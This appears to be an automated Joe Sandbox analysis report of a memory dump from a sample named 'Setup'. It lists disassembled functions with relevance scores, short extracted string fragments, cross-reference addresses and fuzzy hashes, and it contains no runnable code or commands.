P, xrefs: 02C369CA
], xrefs: 02C36A72
[, xrefs: 02C36B4B
n, xrefs: 02C36DA7
), xrefs: 02C369ED
d, xrefs: 02C36AE2
y, xrefs: 02C36DC7
E, xrefs: 02C36AB1
~, xrefs: 02C36DCF
/, xrefs: 02C36A17
}, xrefs: 02C36DB7
$, xrefs: 02C36B1A
c, xrefs: 02C36B83
C, xrefs: 02C36AA3
s, xrefs: 02C36DAF
Q, xrefs: 02C36B05
g, xrefs: 02C36B9F
Q, xrefs: 02C36ED9
}, xrefs: 02C3694C
-, xrefs: 02C36A09
7, xrefs: 02C36A8E
1, xrefs: 02C36A25
e, xrefs: 02C36B91
T, xrefs: 02C3693E
w, xrefs: 02C36AC6
q, xrefs: 02C36BE5
k, xrefs: 02C36BBB
+, xrefs: 02C36B0C
7, xrefs: 02C36A4F
E, xrefs: 02C369F4
L, xrefs: 02C369BC
#, xrefs: 02C36A9C
I, xrefs: 02C36ACD
J, xrefs: 02C36BB4
+, xrefs: 02C369FB
), xrefs: 02C36B52
i, xrefs: 02C36BAD
|, xrefs: 02C36DBF
i, xrefs: 02C369A0
], xrefs: 02C36B59
;, xrefs: 02C36A6B
5, xrefs: 02C36A41
", xrefs: 02C36AFE
{, xrefs: 02C36C2B
9, xrefs: 02C36A5D
4, xrefs: 02C3695A
U, xrefs: 02C36B21
W, xrefs: 02C36A48
_, xrefs: 02C36B67
\, xrefs: 02C36A2C
!, xrefs: 02C369B5
4, xrefs: 02C36EB5
G, xrefs: 02C36ABF
m, xrefs: 02C36BC9
3, xrefs: 02C36A33
Z, xrefs: 02C36C24
E, xrefs: 02C36A1E
u, xrefs: 02C36C01
w, xrefs: 02C36976
M, xrefs: 02C36AE9
O, xrefs: 02C36AF7
Y, xrefs: 02C36B3D
R, xrefs: 02C36A80
A, xrefs: 02C36A95
%, xrefs: 02C369D1
W, xrefs: 02C36A64
K, xrefs: 02C36ADB
@, xrefs: 02C36AD4
<, xrefs: 02C36992
7, xrefs: 02C36B60
\, xrefs: 02C36A10
?, xrefs: 02C36A87
#, xrefs: 02C36AB8
D, xrefs: 02C36B8A
W, xrefs: 02C36B2F
x, xrefs: 02C36B36
o, xrefs: 02C36BD7
8, xrefs: 02C36B44
', xrefs: 02C369DF
S, xrefs: 02C36B13
#, xrefs: 02C369C3
6, xrefs: 02C36AAA
", xrefs: 02C36B28
o, xrefs: 02C36984

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !$"$"$#$#$#$$$%$'$)$)$+$+$-$/$1$3$4$4$5$6$7$7$7$8$9$;$<$=$?$@$A$A$C$D$E$E$E$G$I$J$K$L$M$O$P$Q$Q$R$S$T$U$W$W$W$Y$Z$[$\$\$\$]$]$_$a$c$d$e$g$i$i$k$m$n$o$o$o$q$s$s$u$w$w$w$x$y$y${$|$}$}$}$~
API String ID: 0-1234770202
Opcode ID: e4c484c972bc86fa625bddb783114b0d15e3cd02282268cec38dedbdfa68f213
Instruction ID: 169ce8badbe466e4dfb4dc8d063090f7b1a71c8b0aec2c9e2c4a0633f97ba717
Opcode Fuzzy Hash: e4c484c972bc86fa625bddb783114b0d15e3cd02282268cec38dedbdfa68f213
Instruction Fuzzy Hash: F622042090C7E9CDDB22C6688C487DDBFB15B56318F0846D9C1DD6B2D2C7B90B89CB66

Function 02C359C2 Relevance: 44.1, Strings: 35, Instructions: 319
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t, xrefs: 02C35A99
n, xrefs: 02C35AC4
>, xrefs: 02C35BE4
", xrefs: 02C35C11
r, xrefs: 02C35A8B
#, xrefs: 02C359CE
l, xrefs: 02C35ABC
S, xrefs: 02C35B18
f, xrefs: 02C35AE4
\, xrefs: 02C35AFC
, xrefs: 02C35C09
|, xrefs: 02C35A61
d, xrefs: 02C35ADC
P, xrefs: 02C35B0C
~, xrefs: 02C35A6F
", xrefs: 02C35A14
o, xrefs: 02C35A06
z, xrefs: 02C35A53
b, xrefs: 02C35AD4
v, xrefs: 02C35AA4
<, xrefs: 02C35BDB
Z, xrefs: 02C35AF4
0, xrefs: 02C35CE7
(, xrefs: 02C35D09
x, xrefs: 02C35A45
p, xrefs: 02C35A7D
R, xrefs: 02C35B14
`, xrefs: 02C35ACC
&, xrefs: 02C35C21
^, xrefs: 02C35B04
h, xrefs: 02C35AAC
$, xrefs: 02C35C19
j, xrefs: 02C35AB4
X, xrefs: 02C35AEC
T, xrefs: 02C35B1C

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: $"$"$#$$$&$($0$<$>$P$R$S$T$X$Z$\$^$`$b$d$f$h$j$l$n$o$p$r$t$v$x$z$|$~
API String ID: 0-1210510916
Opcode ID: ada8a240c82e9bc6c498edaa3bd0fe067ec3ae45158ebd87eb671413efb06a7b
Instruction ID: 1f65a5258aec8b109c08c0f051b8ce3ad77926f30f36da8bb717af5c4c4e8762
Opcode Fuzzy Hash: ada8a240c82e9bc6c498edaa3bd0fe067ec3ae45158ebd87eb671413efb06a7b
Instruction Fuzzy Hash: 79E1AF21D087E98ADB22C67C8C483CDBFA15B56324F1843D9C4E9AB3D6C7B54A45CB61

Function 02C10F18 Relevance: 17.2, Strings: 13, Instructions: 939
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{, xrefs: 02C11311
p, xrefs: 02C1153F
>, xrefs: 02C10F2B
5, xrefs: 02C11469
h, xrefs: 02C10FCF
3|b, xrefs: 02C11494
_, xrefs: 02C1180C
+, xrefs: 02C1198B
/, xrefs: 02C110A1
(, xrefs: 02C113F9
a, xrefs: 02C112C8
C, xrefs: 02C110A6
', xrefs: 02C11113

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: '$($+$/$5$>$C$_$a$h$p${$3|b
API String ID: 0-3234521255
Opcode ID: ed02e301070f0e013cbc597596666269a1c3d701abaa35979906261e8b28edc3
Instruction ID: e8ac6fd0a81c4386784260a65d87a7765a9a356ecc5b6eb996bf5d1697057d88
Opcode Fuzzy Hash: ed02e301070f0e013cbc597596666269a1c3d701abaa35979906261e8b28edc3
Instruction Fuzzy Hash: 9582917160C7908BC728DB38C4953AEBBE2ABC6324F098A6DD5ED873C1D6798541DB43

Function 02C11D1F Relevance: 17.0, Strings: 13, Instructions: 767
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 02C1255F
5, xrefs: 02C12557
8, xrefs: 02C12057
7'*e, xrefs: 02C121D6
b, xrefs: 02C124FC
&, xrefs: 02C11DB8
f, xrefs: 02C121B1
U, xrefs: 02C11D2D
<, xrefs: 02C1254F
7'*e, xrefs: 02C121CF
S, xrefs: 02C12567
q, xrefs: 02C12495
f, xrefs: 02C122A1

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: &$0$5$7'*e$7'*e$8$<$S$U$b$f$f$q
API String ID: 0-371082485
Opcode ID: 06b743e0306f1f25e9d7190c0326c14ba613b2cd28404c7c49bcb6fc4e6f96b9
Instruction ID: c03bd33660a167f9b2534889c126815c510e2c2f67106499f12b16dce3ced7d7
Opcode Fuzzy Hash: 06b743e0306f1f25e9d7190c0326c14ba613b2cd28404c7c49bcb6fc4e6f96b9
Instruction Fuzzy Hash: F262B37660C3908FC324DB79C4953AEBBE2AFC6314F09896ED8D987381D6788945DB43

Function 02C37682 Relevance: 14.0, Strings: 11, Instructions: 205COMMON

Download Yara Rule

Strings

T, xrefs: 02C378C4
q, xrefs: 02C37802
e, xrefs: 02C37860
-, xrefs: 02C377AA
H, xrefs: 02C378BF
`, xrefs: 02C3773E
/, xrefs: 02C377B4
*, xrefs: 02C377A5
o, xrefs: 02C3774D
e, xrefs: 02C37807
?, xrefs: 02C377AF

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: *$-$/$?$H$T$`$e$e$o$q
API String ID: 0-2651190063
Opcode ID: a116cc1b4f454f2e3750b8db1752d0c6e5fa70b89d12b9b897069f7db9646bf2
Instruction ID: a5e7714eb7aaabbc2671b09613cd7ad31a040a57511936bcb9962f5e3235ebb9
Opcode Fuzzy Hash: a116cc1b4f454f2e3750b8db1752d0c6e5fa70b89d12b9b897069f7db9646bf2
Instruction Fuzzy Hash: AE71E36260D7E14AD302863C485825BEFD20BD7124F1DCEADE4F6973D6C565C50AC3A3

Function 02C1F552 Relevance: 13.4, Strings: 10, Instructions: 895COMMON

Download Yara Rule

Strings

W^SC, xrefs: 02C1F890
PM=j, xrefs: 02C1F782, 02C1FA23, 02C1FA24, 02C1FA6F, 02C1FA7F
O[KO, xrefs: 02C1F878
thmm, xrefs: 02C1F8A8
nonj, xrefs: 02C1F8F0
ED71, xrefs: 02C1F921
USA\, xrefs: 02C1F888
RS[\, xrefs: 02C1F8A0
5, xrefs: 02C1FFCC
o{ko, xrefs: 02C1F8B8

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 5$ED71$O[KO$PM=j$RS[\$USA\$W^SC$nonj$o{ko$thmm
API String ID: 0-1288658654
Opcode ID: dad8a5b674040313a179e4f9d4d047f6e50ed6098efa63a53b0105a38dde88ff
Instruction ID: e9fa33b9a0d97330cd77fd6d3811c68d84bc2ec825e0a5602097d921744c67c6
Opcode Fuzzy Hash: dad8a5b674040313a179e4f9d4d047f6e50ed6098efa63a53b0105a38dde88ff
Instruction Fuzzy Hash: 9362047160C3818FC325CF28C85166EBBE2AFD6204F188A6DE4E58B791D7758A06DB52

Function 02C225B2 Relevance: 13.0, Strings: 10, Instructions: 527COMMON

Download Yara Rule

Strings

,, xrefs: 02C22B0B
!@, xrefs: 02C225E5
y, xrefs: 02C229BD
(, xrefs: 02C227ED
y, xrefs: 02C229C2
), xrefs: 02C227F2
', xrefs: 02C227E8
H, xrefs: 02C227E3
~, xrefs: 02C229B8
v, xrefs: 02C229B3

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: !@$'$($)$,$H$v$y$y$~
API String ID: 0-501951352
Opcode ID: acd066e3e8fad2943d9dae06d4d13c20d84892f9a5f948f9ec78ad392d8f70f9
Instruction ID: 787c489a4c412f31348dea2958f7dfa435cd77bea63d374a60abacfa606a9bc0
Opcode Fuzzy Hash: acd066e3e8fad2943d9dae06d4d13c20d84892f9a5f948f9ec78ad392d8f70f9
Instruction Fuzzy Hash: A422B13150C7908FD3249F39C89436EBBE1ABC6324F084A6DE8D697391DB798949CB53

Function 02C1D715 Relevance: 10.2, Strings: 8, Instructions: 216COMMON

Download Yara Rule

Strings

z:D<, xrefs: 02C1D7A2
H2V4, xrefs: 02C1D7B2
^&K8, xrefs: 02C1D79A
Y.X , xrefs: 02C1D78A
w*N,, xrefs: 02C1D7D7
^"Q$, xrefs: 02C1D792
F67H, xrefs: 02C1D7BA
B>D0, xrefs: 02C1D7AA

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: B>D0$F67H$H2V4$Y.X $^"Q$$^&K8$w*N,$z:D<
API String ID: 0-1427726062
Opcode ID: a36f89fdf949c2b2d0b2dfd57a5da068a1343a1c4f5c19181d17b6685aa8ec67
Instruction ID: c145470f40552eeba1911205eb19f618cf2becae0acc3f13ec483b3c643d6f4d
Opcode Fuzzy Hash: a36f89fdf949c2b2d0b2dfd57a5da068a1343a1c4f5c19181d17b6685aa8ec67
Instruction Fuzzy Hash: 6761ABB250C3409FD704DFA8984296FFBE2AFD2314F48DC2CE0E59B252D279C2159B96

Function 02C1286D Relevance: 9.2, Strings: 7, Instructions: 498COMMON

Download Yara Rule

Strings

m, xrefs: 02C12E16
E, xrefs: 02C12DB0
7, xrefs: 02C12C61
O, xrefs: 02C12DAB
S, xrefs: 02C12E11
s, xrefs: 02C12BB0
8, xrefs: 02C128EA

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 7$8$E$O$S$m$s
API String ID: 0-1427716340
Opcode ID: bf0ffff0d345008779848fcd3645218e27794a78e04a67ca06cc25071641339a
Instruction ID: fe8fd476ab1903e502f8462b338fc935aee61aafdd242941a1cb7d600cd608d3
Opcode Fuzzy Hash: bf0ffff0d345008779848fcd3645218e27794a78e04a67ca06cc25071641339a
Instruction Fuzzy Hash: 5F129D7560C7908BD364EF38C4953AEBBE2ABC6320F144A2EE8E9873D1D6748445DB53

Function 02C0D310 Relevance: 9.0, Strings: 7, Instructions: 209COMMON

Download Yara Rule

Strings

8#, xrefs: 02C0D654
MO, xrefs: 02C0D5AC
|Q, xrefs: 02C0D52B
#", xrefs: 02C0D64D
QS, xrefs: 02C0D5B3
IK, xrefs: 02C0D5A5
|Q, xrefs: 02C0D77B

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: #"$8#$IK$MO$QS$|Q$|Q
API String ID: 0-3678875208
Opcode ID: ced6022b84fdc683db781b70ad20aa24e11df5a09634e33c7e725272b9825eca
Instruction ID: 7380e0bc9a533df0b7e05ed38d69aaa6273d7d0c94f607ea67bedec0ee42f87a
Opcode Fuzzy Hash: ced6022b84fdc683db781b70ad20aa24e11df5a09634e33c7e725272b9825eca
Instruction Fuzzy Hash: B0B11CB4915344DFE354EF52A889FA57EB0BB42340F5A86E8D0982F376D7309405CFA6

Function 02C0A4D2 Relevance: 7.7, Strings: 6, Instructions: 221COMMON

Download Yara Rule

Strings

40&2, xrefs: 02C0A58E
t, xrefs: 02C0A531
#?#, xrefs: 02C0A586
-1/(, xrefs: 02C0A576
q, xrefs: 02C0A4F6
31-0, xrefs: 02C0A56E

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: t$#?#$-1/($31-0$40&2$q
API String ID: 0-1393827883
Opcode ID: 753a81982b1a8375ebd1d3a054f8bb7a5a991ad253d20124faceb6fc01940a8f
Instruction ID: 72430f2ab3bdc64f17a3f64ab64181449def35151b27468fc80b8c3c00104726
Opcode Fuzzy Hash: 753a81982b1a8375ebd1d3a054f8bb7a5a991ad253d20124faceb6fc01940a8f
Instruction Fuzzy Hash: 1151F52054D3D18AC3118F7994E03AAFFE0AFE3654F18456DE8D10B382C729861EDB66

Function 02C239FD Relevance: 7.6, Strings: 6, Instructions: 88COMMON

Download Yara Rule

Strings

|_hX, xrefs: 02C23AEA
UUSi, xrefs: 02C23A05
8L{z, xrefs: 02C23A45
b``T, xrefs: 02C23A15
+I3, xrefs: 02C23A3D
b ]], xrefs: 02C23A0D

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: +I3$8L{z$UUSi$b ]]$b``T$|_hX
API String ID: 0-2898248994
Opcode ID: 80c391b0ace235ff5cb1c1327da06a32c29fb5435f5b2cf83f01032ca6e6348b
Instruction ID: ad20952dd62a42aefc58672c86a50947627709764cba2851dae9875b41c59243
Opcode Fuzzy Hash: 80c391b0ace235ff5cb1c1327da06a32c29fb5435f5b2cf83f01032ca6e6348b
Instruction Fuzzy Hash: AB21AD716483908FD3154F2980913AAFFE0EBC2714F149A6CE4D557781D379C94ACB52

Function 02C37D72 Relevance: 6.9, Strings: 5, Instructions: 625COMMON

Download Yara Rule

Strings

8, xrefs: 02C37F64
VwRy, xrefs: 02C3811D
5>V, xrefs: 02C37DDC
C, xrefs: 02C37EE0
1>V, xrefs: 02C37D92

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: 1>V$5>V$C$VwRy$8
API String ID: 0-2379611800
Opcode ID: 6bac0098d99f0d5117e4f448402f5eeef7e7d42ba887dc389996246132827263
Instruction ID: 0d64b980ea5582d0f0344f961e02e3be3aab7098c1c320363ec7e40450fa94ac
Opcode Fuzzy Hash: 6bac0098d99f0d5117e4f448402f5eeef7e7d42ba887dc389996246132827263
Instruction Fuzzy Hash: F012DBB2A083408BD310CF65C884B5BBBE6FFC5714F148A2DFA959B390D775D9098B92

Function 02C0AB42 Relevance: 6.6, Strings: 5, Instructions: 357COMMON

Download Yara Rule

Strings

|}, xrefs: 02C0AEE5
@Z, xrefs: 02C0ADBA
}, xrefs: 02C0AD2D
E_, xrefs: 02C0ADB2
PG, xrefs: 02C0ADA2

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: @Z$E_$PG$|}$}
API String ID: 0-2495506168
Opcode ID: 2c98ca4ce7670e303f3b7e21aa3a2113c940a07082853d19c00f11f439564cc5
Instruction ID: b36d413369edd3d5a3904db4360a7c5a4dbd8d586f5f79315e091fefc6b26541
Opcode Fuzzy Hash: 2c98ca4ce7670e303f3b7e21aa3a2113c940a07082853d19c00f11f439564cc5
Instruction Fuzzy Hash: E8B10FB164C3408FD318DF659890AABBBF5EFD2314F14492DE1E28B391D639D60ACB16

Function 02C0BD32 Relevance: 6.6, Strings: 5, Instructions: 349COMMON

Download Yara Rule

Strings

lbi`, xrefs: 02C0C096
e`.-, xrefs: 02C0C048
L[, xrefs: 02C0BDFD
X\, xrefs: 02C0BE05
PH, xrefs: 02C0BDF5

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: L[$PH$X\$e`.-$lbi`
API String ID: 0-1661579417
Opcode ID: ca685cd46ad8921f7597725b7c27d83404727ea77bb20cc563adbfb3b151aa4b
Instruction ID: e69c1bdce22b4f63098e3fc8c3130d2363231ea4248f86816ab56b6592338fb9
Opcode Fuzzy Hash: ca685cd46ad8921f7597725b7c27d83404727ea77bb20cc563adbfb3b151aa4b
Instruction Fuzzy Hash: E6C1237164C3908FD314CF6594D026FBBE2ABD2708F284A2DE5D54B391D7768A0ACB93

Function 02C0EF81 Relevance: 5.6, Strings: 4, Instructions: 609COMMON

Download Yara Rule

Strings

^_OS, xrefs: 02C0F3A5
=4;*, xrefs: 02C0F3C1
@[LC, xrefs: 02C0F3AC
qwk, xrefs: 02C0F3C8

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: =4;*$@[LC$^_OS$qwk
API String ID: 0-509714745
Opcode ID: ae95850d1f9beaa7cab60da507b2fc588712110bbb2af5fc5f3a5700586748e0
Instruction ID: a139815b8a130dc5551c18f94875bd1480f91c99047cb9fe715d5cc4d595a345
Opcode Fuzzy Hash: ae95850d1f9beaa7cab60da507b2fc588712110bbb2af5fc5f3a5700586748e0
Instruction Fuzzy Hash: EC22CE742057818FD725CF29C4D0662BBE2FF96300B28869DC8D68FB96D739E946CB50

Function 02C18B3E Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

D, xrefs: 02C18F3D
*y, xrefs: 02C18C68
x, xrefs: 02C18C7E
yr, xrefs: 02C18C73

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: x$*y$D$yr
API String ID: 0-3058411324
Opcode ID: e3165ff493bcfc53e921b774f969eec0306ea0b3abe8ba6652f4ebe74cf20904
Instruction ID: 103a89eee9e097d583958e8d24acb376a80d8aa28c2b3a81343dde39643d4046
Opcode Fuzzy Hash: e3165ff493bcfc53e921b774f969eec0306ea0b3abe8ba6652f4ebe74cf20904
Instruction Fuzzy Hash: 45A1BFB1509390CBE3288F54C4657ABBBF1FF82354F0A8A5CD4D56B291E3788A44CB96

Function 02C1E560 Relevance: 5.2, Strings: 4, Instructions: 202COMMON

Download Yara Rule

Strings

TP, xrefs: 02C1E5BF
WX, xrefs: 02C1E5B7
"BCD, xrefs: 02C1E6B8
Xstu, xrefs: 02C1E751

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: "BCD$TP$WX$Xstu
API String ID: 0-826843603
Opcode ID: b7fdb470a33314f6d4297e7063fdf6e8368b6594f58d73747934d8d68845dd05
Instruction ID: 2562cbe7157ec81f364bd5a19cce85c88f9c3f76288956939a376127bc583c8c
Opcode Fuzzy Hash: b7fdb470a33314f6d4297e7063fdf6e8368b6594f58d73747934d8d68845dd05
Instruction Fuzzy Hash: AF51DEB59083118BD710CF24C85222BBBF1FF96704F54982CE9D5AB391E339CA06DB5A

Function 02C26219 Relevance: 5.2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

Strings

eb`|, xrefs: 02C263E9
xzy|, xrefs: 02C2644F
xzy|, xrefs: 02C263F7
ztrz, xrefs: 02C26405

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: eb`|$xzy|$xzy|$ztrz
API String ID: 0-2346729475
Opcode ID: cb5a037dfb8ed190ede9148edda118d26c08066c8de1145a06f7ecdb54039dc7
Instruction ID: ab6cf9d45d53db0f14e7bc8a8c21b5e357edde39f4ae745a4c37ef55998b96cb
Opcode Fuzzy Hash: cb5a037dfb8ed190ede9148edda118d26c08066c8de1145a06f7ecdb54039dc7
Instruction Fuzzy Hash: 1E517D72D04276CFCB14CF64C4802EABBB5FF59340B298569D8A59B345D734EA4ACBE0

Function 02C16882 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

N3x5, xrefs: 02C169A8
D+,-, xrefs: 02C16919
H?E!, xrefs: 02C168F8
O'G), xrefs: 02C1690E

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: D+,-$H?E!$N3x5$O'G)
API String ID: 0-597650740
Opcode ID: 31b068d1ab63c86698f6cfa1c5cbce945b20e7cc8e4fd355a24e81b787d51579
Instruction ID: 81ec145c99811664378a51185d5e4d2814a181ed5560dce83a53db75fc48975d
Opcode Fuzzy Hash: 31b068d1ab63c86698f6cfa1c5cbce945b20e7cc8e4fd355a24e81b787d51579
Instruction Fuzzy Hash: CA310F71A483408BD3349F18C8827ABB3B5EF87324F048A1CE8D58B3D4EB348940DB96

Function 02C1D9FC Relevance: 4.4, Strings: 3, Instructions: 648COMMON

Download Yara Rule

Strings

HI, xrefs: 02C1DE09
AC, xrefs: 02C1DDF9
EG, xrefs: 02C1DE01

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: HI$AC$EG
API String ID: 0-510928359
Opcode ID: 7c17e3b7b10553e4d258fe94ea2b9ae111ce6d35ee97d525ebc509b79caa9a54
Instruction ID: 08761feb5145fb7b2be2eb2eaaaf67ad314ecc0969f3441826f8b45ef37113aa
Opcode Fuzzy Hash: 7c17e3b7b10553e4d258fe94ea2b9ae111ce6d35ee97d525ebc509b79caa9a54
Instruction Fuzzy Hash: 8F0200716083118BC710DF68C88236BB7E1EFD6364F088A5CE8D68B394E778D645E796

Function 02C17842 Relevance: 4.3, Strings: 3, Instructions: 557COMMON

Download Yara Rule

Strings

p-./, xrefs: 02C17BBF
f!K#, xrefs: 02C17BA7
H%C', xrefs: 02C17BAF

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: H%C'$f!K#$p-./
API String ID: 0-2974429307
Opcode ID: 49c818c5792c626cffebaac9169d254a12df7fb4022357f8a0d5a937eeb2ed43
Instruction ID: ef2e312cbbb14f8dfa22c9354bced185daf05903700e498ee058a2f74d0caa07
Opcode Fuzzy Hash: 49c818c5792c626cffebaac9169d254a12df7fb4022357f8a0d5a937eeb2ed43
Instruction Fuzzy Hash: 07F101716083128BD3149F29C89176BF7E2FFCA744F09896DE8CA9B390E7348A05D756

Function 02C2E118 Relevance: 4.2, Strings: 3, Instructions: 487COMMON

Download Yara Rule

Strings

p, xrefs: 02C2E611
;\, xrefs: 02C2E40A
pbUq, xrefs: 02C2E326

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: ;\$p$pbUq
API String ID: 0-2362925771
Opcode ID: 69e25b920ca7ccdad5ef3b7033a7bdba34408d9de553430339bf444beb0ec28f
Instruction ID: 9c51b1a26d5c2ede6504cf369d2bcf1872e395a7555aea08c74323fe17708aab
Opcode Fuzzy Hash: 69e25b920ca7ccdad5ef3b7033a7bdba34408d9de553430339bf444beb0ec28f
Instruction Fuzzy Hash: 16E1277160C3A18ED7258F28C4407ABBFD1AF97344F18496DD4D9AB282DB78950AC753

Function 02C1AEE2 Relevance: 4.0, Strings: 2, Instructions: 1479COMMON

Download Yara Rule

Strings

|{, xrefs: 02C1B396
}r, xrefs: 02C1B38E

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c00000_Setup.jbxd

Yara matches

Similarity

API ID:
String ID: |{$}r
API String ID: 0-3788219015
Opcode ID: 4899ac2b2a4394e4f8f2f8cb882d730f63f9d59d5926909ca3f4fd15655cb395
Instruction ID: 45c6ceaad6ad28cd0ea4d7b39f71f2cd1ab82940429067e219949ec95f23b32f
Opcode Fuzzy Hash: 4899ac2b2a4394e4f8f2f8cb882d730f63f9d59d5926909ca3f4fd15655cb395
Instruction Fuzzy Hash: 4BA202756483009BD314DF65CC81B2EBBA2FBC6308F28896CEAC497261DB71DD41EB42

Function 02C06372 Relevance: 3.3, Strings: 2, Instructions: 809COMMON

Download Yara Rule

Strings

8, xrefs: 02C06CD6
0, xrefs: 02C06CDE

Memory Dump Source

Source File: 00000000.00000002.1892470268.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C00000, based on PE: false

Joe Sandbox IDA Plugin

